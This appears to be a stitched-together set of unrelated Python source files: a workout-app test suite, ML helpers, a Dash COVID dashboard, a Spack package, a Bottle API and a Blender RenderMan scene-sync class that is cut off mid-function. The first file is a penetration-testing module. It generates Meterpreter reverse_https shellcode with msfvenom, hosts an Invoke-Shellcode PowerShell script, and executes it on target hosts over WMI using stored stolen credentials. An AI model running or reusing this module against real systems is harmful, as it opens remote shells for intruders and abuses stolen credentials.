txt_format = Format('txt', [';', ','], txt_toTree, txt_fromTree)
|
python
|
from __future__ import print_function
from recon.core.module import BaseModule
import os
import subprocess
from libs.pentestlymodule import PentestlyModule
from libs.misc import parse_mimikatz, Colors
class Module(PentestlyModule):
meta = {
'name': 'Execute Mimikatz',
'author': 'Cory Duplantis (@ctfhacker)',
'description': 'Remotely downloads Invoke-Mimikatz.ps1 and executes via WMI.',
'query': 'SELECT username,password,domain,host FROM pentestly_creds WHERE success="True" AND execute!="False"',
'options': (
('LHOST', '', True, 'Target to connect back to'),
('RHOST', '', True, 'Target to connect to'),
),
}
def __init__(self, *args, **kwargs):
result = BaseModule.__init__(self, *args, **kwargs)
self.hosting_server = ''
self.new_script_name = '/root/.recon-ng/scripts/shellcode.ps1'
return result
def prep_shellcode(self, lhost):
'''Get a meterpreter completely in memory'''
with open('/root/.recon-ng/scripts/Invoke-Shellcode.ps1', 'r') as f:
script = f.read()
for arch,cmd in [('32', '/root/metasploit/msfvenom -p windows/meterpreter/reverse_https -f c EXITFUNC=thread LHOST={}'.format(lhost)),
('64', '/root/metasploit/msfvenom -p windows/x64/meterpreter/reverse_https -f c EXITFUNC=thread LHOST={}'.format(lhost))]:
print(cmd)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Convert shellcode from \x00\x01\x02 -> 0x01,0x02,x03
shellcode = proc.communicate()[0]
# x86/x64 have different lengths of description before the shellcode.
# Dynamically determine how large that description is
index = [index+1 for index,line in enumerate(shellcode.split('\n')) if 'unsigned char' in line][0]
self.output(index)
self.output('\n'.join(shellcode.split('\n')[:index]))
shellcode = ''.join(shellcode.split('\n')[index:])
shellcode = shellcode.split(';')[0]
shellcode = shellcode.replace('\n','')
shellcode = shellcode.replace('"','')
shellcode = ',0x'.join(shellcode.split('\\x'))[1:]
script = script.replace("REPLACEME{}".format(arch), shellcode)
self.output("Writing new Invoke-Shellcode script to {}".format(self.new_script_name))
with open(self.new_script_name, 'w') as f:
f.write(script)
def module_pre(self):
self.start_webserver()
self.test_execute()
def module_run(self, creds):
self.prep_shellcode(self.options['lhost'])
rhost = self.options['rhost'].replace(' ', '').split(',')
share = 'C$'
url='http://{}/{}'.format(self.hosting_server, self.new_script_name.split('/')[-1])
args = 'Invoke-Shellcode -Force'
command = self.powershell_download(script_url=url, args=args, post_url=self.hosting_server)
print(creds[0])
print(len(creds))
creds = [cred for cred in creds if cred[3] in rhost]
print(len(creds))
# Reduce creds if options are given
for username, password, domain, host in creds:
try:
self.output("Execution creds: {}\{}:{}@{}".format(domain, username, password, host))
self.wmi_execute(username, password, domain, host, command)
except Exception as e:
print(str(e))
continue
def module_post(self):
self.stop_webserver()
|
python
|
if __name__ == "__main__":
if __package__ is None:
# add parent dir to allow relative import
from pathlib import Path
import sys
top = Path(__file__).resolve().parents[1]
sys.path.append(str(top))
# PEP 0366
__package__ = "lvscharts"
__import__(__package__)
from lvscharts.cli import cli
cli()
|
python
|
from .toolbar_controller import ToolbarController
|
python
|
from unittest import TestCase
import unittest
from rengine.config import TIME_BASED_CONDITIONS, ExerciseType, MuscleGroup
from rengine.exercises import pick_random_exercise
import dataframe_image as dfi
from rengine.workouts import AutoGeneratedWorkout, BaseWorkout, LowerBodyWorkout, UpperBodyWorkout, dictionary_addition
class TestDictionAdd(TestCase):
def test_add_with_same_keys(self):
dict1 = dict(a = 1, b = 2, c = 56)
dict2 = dict(a = 0.5, b = 20, c = 6)
added_dict = dictionary_addition((dict1, dict2))
self.assertDictEqual(added_dict, dict(a = 1.5, b = 22, c = 62), "Dictionary key value pairs are not adding correctly.")
def test_add_with_different_keys(self):
dict1 = dict(a = 1, b = 2, d = 56)
dict2 = dict(a = 0.5, b = 20, c = 6)
added_dict = dictionary_addition((dict1, dict2))
self.assertDictEqual(added_dict, dict(a = 1.5, b = 22, c = 6, d = 56), "Dictionary key value pairs are not adding correctly when keys are different.")
class TestBaseWorkout(TestCase):
def test_if_workout_has_correct_load(self):
workout = BaseWorkout([
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
])
self.assertDictEqual(workout.load_per_muscle_group, {
MuscleGroup.CALVES:2,
MuscleGroup.CHEST:5,
MuscleGroup.BACK:1,
MuscleGroup.TRICEPS:0,
MuscleGroup.BICEPS:0,
MuscleGroup.DELTOIDS:0,
MuscleGroup.QUAD:0,
MuscleGroup.HAMSTRINGS:0
}, "Workouts load per muscle group not returning correct loads.")
class TestAutoGeneratedWorkout(TestCase):
def test_if_min_muscle_gets_least_worked_muscle_that_is_being_trained(self):
workout1 = AutoGeneratedWorkout(15, [MuscleGroup.CHEST, MuscleGroup.BACK, MuscleGroup.CALVES], exercises= [
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
])
self.assertEqual(workout1._find_next_muscle_group_to_work(), MuscleGroup.BACK, "AutoGeneratedWorkout is not correctly finding least worked muscle that is trainable.")
workout1.add_exercises([pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY) for i in range(6)])
self.assertEqual(workout1._find_next_muscle_group_to_work(), MuscleGroup.CHEST, "AutoGeneratedWorkout is not correctly finding least worked muscle that is trainable.")
class TestLowerBodyWorkout(TestCase):
def test_generate(self):
for i in range(15, 121, 15):
workout = LowerBodyWorkout(i,"Barbell Squat")
workout.create()
self.assertGreater(len(workout.workout), 0, "No exercises were generated for this Lower body workout.")
for exercise in workout.workout:
self.assertIn(exercise.muscle_group, MuscleGroup.LOWER_BODY, "Lower body workout has a non-lower body exercise in it.")
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is at least 7.5 minutes longer or shorter than expected")
tbc = TIME_BASED_CONDITIONS[i]
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Lower body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_muscle_group_cap(self):
for i in range(15, 121, 15):
tbc = TIME_BASED_CONDITIONS[i]
workout = LowerBodyWorkout(i,"Romanian Deadlift")
workout.create()
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Upper body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_buffer_times(self):
for x in range(3):
for i in range(15, 121, 15):
workout = LowerBodyWorkout(i,"Barbell Squat")
workout.create()
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is at least 7.5 minutes longer or shorter than expected")
class TestUpperBodyWorkout(TestCase):
def test_generate(self):
for i in range(15, 121, 15):
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
self.assertGreater(len(workout.workout), 0, "No exercises were generated for this upper body workout.")
for exercise in workout.workout:
self.assertIn(exercise.muscle_group, MuscleGroup.UPPER_BODY, "Upper body workout has a non-upper body exercise in it.")
def test_muscle_group_cap(self):
for i in range(15, 121, 15):
tbc = TIME_BASED_CONDITIONS[i]
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Lower body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_buffer_times(self):
for x in range(3):
for i in range(15, 121, 15):
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is at least 7.5 minutes longer or shorter than expected")
if __name__ == "__main__":
unittest.main()
|
python
|
from sklearn.linear_model import RidgeClassifierCV, RidgeClassifier
from eye_detector.train.models.find import find_params
from eye_detector.train.models.decorator import ModelDecorator
def ridge(x, y, shape):
grid = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1])
alpha = find_params(grid, x, y, attr="alpha_", best_attr="alpha_")
ridge = RidgeClassifier(alpha=alpha)
return ModelDecorator(ridge)
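# For reference, a plain-sklearn sketch of the same idea without the project helpers
# (find_params / ModelDecorator): let RidgeClassifierCV pick alpha_ by cross-validation,
# then refit a RidgeClassifier with that alpha. Illustrative only.
def ridge_sklearn_only(x, y):
    cv_model = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1]).fit(x, y)
    return RidgeClassifier(alpha=cv_model.alpha_).fit(x, y)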
|
python
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import pandas as pd
import plotly.graph_objects as go
import numpy as np
external_stylesheets = ["https://codepen.io/chriddyp/pen/bWLwgP.css"]
data_url = "https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv"
data = pd.read_csv(data_url)
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div(
children=[
html.H1(children="COVID-19 Dashboard"),
dcc.Dropdown(id="coloraxes"),
dcc.Graph(
id="chloropleth",
figure=go.Figure(go.Choropleth(locationmode="country names")),
),
dcc.Slider(
id="Date",
min=0,
max=len(data["Date"].unique()) - 1,
value=0,
marks={
i: {"label": str(date), "style": {"transform": "rotate(45deg)"}}
for i, date in enumerate(data["Date"].unique())
},
step=None,
),
]
)
@app.callback(
Output("chloropleth", "figure"), [Input("Date", "value")], [State("Date", "marks")]
)
def color_graph(date_val, dates):
if date_val is None:
PreventUpdate()
date = dates[str(date_val)]["label"]
fig = go.Figure()
fig.add_choropleth(z=data[data["Date"]==date]["Confirmed"],
locations=data[data["Date"]==date]["Country"],
locationmode="country names"
)
return(fig)
if __name__ == "__main__":
app.run_server()
|
python
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RStatnetCommon(RPackage):
"""Non-statistical utilities used by the software developed by the
Statnet Project. They may also be of use to others."""
homepage = "http://www.statnet.org"
url = "https://cloud.r-project.org/src/contrib/statnet.common_3.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/statnet.common"
version('4.3.0', sha256='834a3359eac967df0420eee416ae4983e3b502a3de56bb24f494a7ca4104e959')
version('4.2.0', sha256='1176c3303436ebe858d02979cf0a0c33e4e2d1f3637516b4761d573ccd132461')
version('3.3.0', sha256='d714c4e7b0cbf71b7a628af443f5be530e74ad1e21f6b04f1b1087f6d7e40fa4')
depends_on('[email protected]:', when='@4.2.0:', type=('build', 'run'))
depends_on('r-coda', when='@4.1.2:', type=('build', 'run'))
|
python
|
# Group: Gabriel Macaúbas Melo, Louise Fernandes Caetano, Maria Eduarda de Almeida Vitorino and Fernando Luiz Castro Seixas
# Importing functions
from functions import *
# Main program
num = iniciar()
cartelas = criar_cartela(num)
sorteio(cartelas)
|
python
|
import os
from sklearn import datasets
import xgboost as xgb
from xgboost_ray import RayDMatrix, predict
import numpy as np
def main():
if not os.path.exists("simple.xgb"):
raise ValueError(f"Model file not found: `simple.xgb`"
f"\nFIX THIS by running `python `simple.py` first to "
f"train the model.")
# Load dataset
data, labels = datasets.load_breast_cancer(return_X_y=True)
dmat_xgb = xgb.DMatrix(data, labels)
dmat_ray = RayDMatrix(data, labels)
bst = xgb.Booster(model_file="simple.xgb")
pred_xgb = bst.predict(dmat_xgb)
pred_ray = predict(bst, dmat_ray)
np.testing.assert_array_equal(pred_xgb, pred_ray)
print(pred_ray)
if __name__ == "__main__":
main()
|
python
|
# FP involving global variables modified in a different scope
i = 0
def update_i():
global i
i = i + 1
update_i()
if i > 0:
print("i is greater than 0") # FP: This is reachable
|
python
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from functools import wraps
from common import Logging
from common.Logging import get_generic_logger
from common.YamlConfig import AppConfig
from lib.bottle import Bottle, request, response
from ..AppRunner import AppRunner
from ..RemoteServerApi import get_server_config, get_server_info
app = Bottle()
logger = get_generic_logger()
@app.route('/si', method=['GET'])
def si():
try:
return get_server_info()
except Exception as e:
return {'status': e}
@app.route('/cf', method=['GET'])
def cf():
try:
return get_server_config()
except Exception as e:
return {'status': e}
@app.route('/rl/:dir/:name', method=['GET'])
def get_rl(dir, name):
try:
return Logging.get_log_content(dir, name)
except Exception as e:
return {'status': e}
def log_to_logger(fn):
@wraps(fn)
def _log_to_logger(*args, **kwargs):
actual_response = fn(*args, **kwargs)
logger.info('%s %s %s %s' % (request.remote_addr, request.method, request.url, response.status))
return actual_response
return _log_to_logger
class WebModule(AppRunner):
name = 'api'
def get_config(self):
conf = {}
conf['host'] = '127.0.0.1'
conf['port'] = 5556
if AppConfig.conf().get('web'):
conf['host'] = AppConfig.conf().get('web').get('host', '127.0.0.1')
conf['port'] = AppConfig.conf().get('web').get('port', 5556)
return conf
def run_app(self):
api_app = Bottle()
api_app.install(log_to_logger)
app.install(log_to_logger)
api_app.mount('/api/', app)
conf = self.get_config()
api_app.config['host'] = conf['host']
api_app.config['port'] = conf['port']
api_app.run(host=api_app.config['host'], port=api_app.config['port'])
if __name__ == '__main__':
app = WebModule()
print(app.name)
app.run()
|
python
|
# utils
from .rfb_utils import object_utils
from .rfb_utils import transform_utils
from .rfb_utils import texture_utils
from .rfb_utils import scene_utils
from .rfb_utils import shadergraph_utils
from .rfb_logger import rfb_log
from .rman_sg_nodes.rman_sg_lightfilter import RmanSgLightFilter
from . import rman_constants
import bpy
class RmanSceneSync(object):
'''
The RmanSceneSync class handles keeping the RmanScene object in sync
during IPR.
Attributes:
rman_render (RmanRender) - pointer back to the current RmanRender object
rman () - rman python module
rman_scene (RmanScene) - pointer to the current RmanScene object
sg_scene (RixSGSCene) - the RenderMan scene graph object
'''
def __init__(self, rman_render=None, rman_scene=None, sg_scene=None):
self.rman_render = rman_render
self.rman = rman_render.rman
self.rman_scene = rman_scene
self.sg_scene = sg_scene
self.new_objects = set() # set of objects that were added to the scene
self.new_cameras = set() # set of new camera objects that were added to the scene
self.update_instances = set() # set of objects we need to update their instances
self.update_particles = set() # set of objects we need to update their particle systems
self.do_delete = False # whether or not we need to do an object deletion
self.do_add = False # whether or not we need to add an object
self.num_instances_changed = False # if the number of instances has changed since the last update
@property
def sg_scene(self):
return self.__sg_scene
@sg_scene.setter
def sg_scene(self, sg_scene):
self.__sg_scene = sg_scene
def update_view(self, context, depsgraph):
camera = depsgraph.scene.camera
self.rman_scene.context = context
self.rman_scene.depsgraph = depsgraph
self.rman_scene.bl_scene = depsgraph.scene_eval
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.is_viewport_render:
ob = translator.update_viewport_resolution(rman_sg_camera)
if ob:
translator.update_viewport_cam(ob, rman_sg_camera, force_update=True)
translator.update_transform(None, rman_sg_camera)
else:
translator.update_transform(camera, rman_sg_camera)
def _scene_updated(self):
# Check changes to local view
if self.rman_scene.bl_local_view and (self.rman_scene.context.space_data.local_view is None):
self.rman_scene.bl_local_view = False
for ob in self.rman_scene.bl_scene.objects:
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA', 'LIGHT'):
continue
self.clear_instances(ob)
self.update_instances.add(ob.original)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.check_solo_light()
elif not self.rman_scene.bl_local_view and (self.rman_scene.context.space_data.local_view is not None):
self.rman_scene.bl_local_view = True
for ob in self.rman_scene.bl_scene.objects:
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA', 'LIGHT'):
continue
self.clear_instances(ob)
self.update_instances.add(ob.original)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.check_solo_light()
# Check view_layer
view_layer = self.rman_scene.depsgraph.view_layer
if len(view_layer.objects) != self.rman_scene.num_objects_in_viewlayer:
# objects can be removed from the viewlayer by hiding a collection.
# Figure out the difference using sets and re-emit their instances.
self.rman_scene.num_objects_in_viewlayer = len(view_layer.objects)
view_layer = self.rman_scene.depsgraph.view_layer
set1 = set(self.rman_scene.objects_in_viewlayer)
set2 = set((view_layer.objects))
set_diff1 = set1.difference(set2)
set_diff2 = set2.difference(set1)
objects = list(set_diff1.union(set_diff2))
for o in list(objects):
try:
self.update_instances.add(o.original)
self.clear_instances(o)
self.update_particles.add(o)
self.update_geometry_node_instances(o)
except:
continue
self.rman_scene.objects_in_viewlayer = [o for o in view_layer.objects]
if self.rman_scene.bl_frame_current != self.rman_scene.bl_scene.frame_current:
# frame changed, update any materials and objects that
# are marked as frame sensitive
rfb_log().debug("Frame changed: %d -> %d" % (self.rman_scene.bl_frame_current, self.rman_scene.bl_scene.frame_current))
self.rman_scene.bl_frame_current = self.rman_scene.bl_scene.frame_current
material_translator = self.rman_scene.rman_translators["MATERIAL"]
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
# update frame number
options = self.rman_scene.sg_scene.GetOptions()
options.SetInteger(self.rman.Tokens.Rix.k_Ri_Frame, self.rman_scene.bl_frame_current)
self.rman_scene.sg_scene.SetOptions(options)
for mat in bpy.data.materials:
db_name = object_utils.get_db_name(mat)
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
if rman_sg_material and rman_sg_material.is_frame_sensitive:
material_translator.update(mat, rman_sg_material)
for o in bpy.data.objects:
rman_type = object_utils._detect_primitive_(o)
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
if not rman_sg_node:
continue
translator = self.rman_scene.rman_translators.get(rman_type, None)
if translator and rman_sg_node.is_frame_sensitive:
translator.update(o, rman_sg_node)
def _mesh_light_update(self, mat):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob_inst in self.rman_scene.depsgraph.object_instances:
psys = None
if ob_inst.is_instance:
ob = ob_inst.instance_object
group_db_name = object_utils.get_group_db_name(ob_inst)
else:
ob = ob_inst.object
group_db_name = object_utils.get_group_db_name(ob_inst)
if not hasattr(ob.data, 'materials'):
continue
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA'):
continue
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_node:
found = False
for name, material in ob.data.materials.items():
if name == mat.name:
found = True
if found:
rman_sg_group = rman_sg_node.instances.get(group_db_name, None)
if rman_sg_group:
rman_sg_node.instances.pop(group_db_name)
self.rman_scene.sg_scene.DeleteDagNode(rman_sg_group.sg_node)
self.rman_scene._export_instance(ob_inst)
def _material_updated(self, obj):
mat = obj.id
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
translator = self.rman_scene.rman_translators["MATERIAL"]
db_name = object_utils.get_db_name(mat)
if not rman_sg_material:
# Double check if we can't find the material because of an undo
rman_sg_material = self.update_materials_dict(mat)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
mat = obj.id
if not rman_sg_material:
rfb_log().debug("New material: %s" % mat.name)
db_name = object_utils.get_db_name(mat)
rman_sg_material = translator.export(mat, db_name)
self.rman_scene.rman_materials[mat.original] = rman_sg_material
else:
rfb_log().debug("Material, call update")
translator.update(mat, rman_sg_material)
# update db_name
rman_sg_material.db_name = db_name
def _light_filter_transform_updated(self, obj):
ob = obj.id
rman_sg_lightfilter = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_lightfilter:
rman_group_translator = self.rman_scene.rman_translators['GROUP']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rman_group_translator.update_transform(ob, rman_sg_lightfilter)
def _gpencil_transform_updated(self, obj):
ob = obj.id
rman_sg_gpencil = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_gpencil:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rman_group_translator = self.rman_scene.rman_translators['GROUP']
for ob_inst in self.rman_scene.depsgraph.object_instances:
group_db_name = object_utils.get_group_db_name(ob_inst)
rman_sg_group = rman_sg_gpencil.instances.get(group_db_name, None)
if rman_sg_group:
rman_group_translator.update_transform(ob, rman_sg_group)
def _obj_geometry_updated(self, obj):
ob = obj.id
rman_type = object_utils._detect_primitive_(ob)
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_type in ['LIGHT', 'LIGHTFILTER', 'CAMERA']:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if rman_type == 'LIGHTFILTER':
self.rman_scene.rman_translators['LIGHTFILTER'].update(ob, rman_sg_node)
for light_ob in rman_sg_node.lights_list:
if isinstance(light_ob, bpy.types.Material):
rman_sg_material = self.rman_scene.rman_materials.get(light_ob.original, None)
if rman_sg_material:
self.rman_scene.rman_translators['MATERIAL'].update_light_filters(light_ob, rman_sg_material)
else:
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
elif rman_type == 'LIGHT':
self.rman_scene.rman_translators['LIGHT'].update(ob, rman_sg_node)
if not self.rman_scene.scene_solo_light:
# only set if a solo light hasn't been set
if not self.rman_scene.check_light_local_view(ob, rman_sg_node):
rman_sg_node.sg_node.SetHidden(ob.data.renderman.mute)
elif rman_type == 'CAMERA':
ob = ob.original
rman_camera_translator = self.rman_scene.rman_translators['CAMERA']
if not self.rman_scene.is_viewport_render:
rman_camera_translator.update(ob, rman_sg_node)
else:
rman_camera_translator.update_viewport_cam(ob, rman_sg_node, force_update=True)
else:
if rman_sg_node.rman_type != rman_type:
# for now, we don't allow the rman_type to be changed
rfb_log().error("Changing primitive type is currently not supported.")
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator = self.rman_scene.rman_translators.get(rman_type, None)
if not translator:
return
translator.update(ob, rman_sg_node)
translator.export_object_primvars(ob, rman_sg_node)
# material slots could have changed, so we need to double
# check that too
for k,v in rman_sg_node.instances.items():
self.rman_scene.attach_material(ob, v)
if rman_sg_node.sg_node:
if not ob.show_instancer_for_viewport:
rman_sg_node.sg_node.SetHidden(1)
else:
rman_sg_node.sg_node.SetHidden(-1)
def update_light_visibility(self, rman_sg_node, ob):
if not self.rman_scene.scene_solo_light:
vis = rman_sg_node.sg_node.GetHidden()
if vis == -1:
vis = 0
result = False
update_instances = False
# if vis is inherit, and none of the other visibility attrs are set to hide
if vis == -1 and not ob.hide_get() and int(ob.renderman.mute) == 0:
update_instances = True
result = False
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.check_light_local_view(ob, rman_sg_node):
update_instances = True
result = True
elif not ob.hide_get():
rman_sg_node.sg_node.SetHidden(ob.renderman.mute)
update_instances = True
result = (vis != int(ob.renderman.mute))
else:
rman_sg_node.sg_node.SetHidden(1)
result = (vis != 1)
if update_instances and len(rman_sg_node.instances) < 1:
self.update_instances.add(ob.original)
return result
def update_object_visibility(self, rman_sg_node, ob):
ob_data = bpy.data.objects.get(ob.name, ob)
rman_type = object_utils._detect_primitive_(ob_data)
particle_systems = getattr(ob_data, 'particle_systems', list())
has_particle_systems = len(particle_systems) > 0
is_hidden = ob_data.hide_get()
# double check hidden value
if rman_type in ['LIGHT']:
if self.update_light_visibility(rman_sg_node, ob):
rfb_log().debug("Update light visibility: %s" % ob.name)
return True
else:
if rman_sg_node.is_hidden != is_hidden:
self.do_delete = False
rman_sg_node.is_hidden = is_hidden
if rman_type == 'EMPTY':
self.update_empty(ob, rman_sg_node)
else:
self.update_instances.add(ob.original)
self.clear_instances(ob, rman_sg_node)
if has_particle_systems:
self.update_particles.add(ob.original)
return True
return False
def update_particle_settings(self, obj, particle_settings_node):
rfb_log().debug("Check %s for particle settings." % obj.id.name)
# A ParticleSettings node was updated. Try to look for it.
ob = obj.id
rman_type = object_utils._detect_primitive_(ob)
for psys in obj.id.particle_systems:
if psys.settings.original == particle_settings_node:
if psys.settings.type == 'FLIP' and rman_type == 'FLUID':
fluid_translator = self.rman_scene.rman_translators['FLUID']
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
fluid_translator.update(ob, rman_sg_node)
return
ob_psys = self.rman_scene.rman_particles.get(obj.id.original, dict())
rman_sg_particles = ob_psys.get(psys.settings.original, None)
if rman_sg_particles:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
psys_translator = self.rman_scene.rman_translators['PARTICLES']
psys_translator.update(obj.id, psys, rman_sg_particles)
return
# This is a particle instancer. The instanced object needs to be updated
elif object_utils.is_particle_instancer(psys):
inst_object = getattr(particle_settings_node, 'instance_object', None)
collection = getattr(particle_settings_node, 'instance_collection', None)
if inst_object:
self.update_instances.add(inst_object.original)
if collection:
for col_obj in collection.all_objects:
if col_obj.original not in self.rman_scene.rman_objects:
self.new_objects.add(col_obj.original)
self.update_instances.add(col_obj.original)
break
# Update any other instance objects this object instanced. The instanced
# object may have changed
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
def update_particle_systems(self):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob in self.update_particles:
rman_type = object_utils._detect_primitive_(ob)
if rman_type not in ['MESH', 'POINTS']:
continue
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
ob_eval = ob.evaluated_get(self.rman_scene.depsgraph)
rfb_log().debug("Update particle systems for: %s" % ob.name)
# any objects that this object instanced, need to update their instances
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
if rman_sg_node.rman_sg_particle_group_node:
rman_sg_node.rman_sg_particle_group_node.sg_node.RemoveAllChildren()
if len(ob_eval.particle_systems) < 1:
continue
if not rman_sg_node.rman_sg_particle_group_node:
db_name = rman_sg_node.db_name
particles_group_db = ''
rman_sg_node.rman_sg_particle_group_node = self.rman_scene.rman_translators['GROUP'].export(None, particles_group_db)
rman_sg_node.sg_node.AddChild(rman_sg_node.rman_sg_particle_group_node.sg_node)
psys_translator = self.rman_scene.rman_translators['PARTICLES']
for psys in ob_eval.particle_systems:
if object_utils.is_particle_instancer(psys):
# this particle system is an instancer, add the instanced object
# to the self.update_instances list
inst_ob = getattr(psys.settings, 'instance_object', None)
collection = getattr(psys.settings, 'instance_collection', None)
if inst_ob:
self.update_instances.add(inst_ob.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(inst_ob.original, None)
if rman_instance_sg_node:
self.clear_instances(inst_ob.original, rman_instance_sg_node)
elif collection:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(col_obj.original, None)
if rman_instance_sg_node:
self.clear_instances(col_obj.original, rman_instance_sg_node)
else:
self.new_objects.add(col_obj.original)
continue
ob_psys = self.rman_scene.rman_particles.get(ob_eval.original, dict())
rman_sg_particles = ob_psys.get(psys.settings.original, None)
if not rman_sg_particles:
psys_db_name = '%s' % psys.name
rman_sg_particles = psys_translator.export(ob, psys, psys_db_name)
if not rman_sg_particles:
continue
psys_translator.update(ob, psys, rman_sg_particles)
ob_psys[psys.settings.original] = rman_sg_particles
self.rman_scene.rman_particles[ob.original] = ob_psys
rman_sg_node.rman_sg_particle_group_node.sg_node.AddChild(rman_sg_particles.sg_node)
def update_empty(self, ob, rman_sg_node=None):
rfb_log().debug("Update empty: %s" % ob.name)
if ob.is_instancer:
collection = ob.instance_collection
if collection:
if self.num_instances_changed:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(col_obj.original, None)
if rman_instance_sg_node:
self.clear_instances(col_obj.original, rman_instance_sg_node)
else:
self.new_objects.add(col_obj.original)
self.update_particles.add(col_obj)
else:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
self.update_particles.add(col_obj)
else:
translator = self.rman_scene.rman_translators['EMPTY']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.export_transform(ob, rman_sg_node.sg_node)
if ob.renderman.export_as_coordsys:
self.rman_scene.get_root_sg_node().AddCoordinateSystem(rman_sg_node.sg_node)
else:
self.rman_scene.get_root_sg_node().RemoveCoordinateSystem(rman_sg_node.sg_node)
def reemit_instances(self):
# update instances
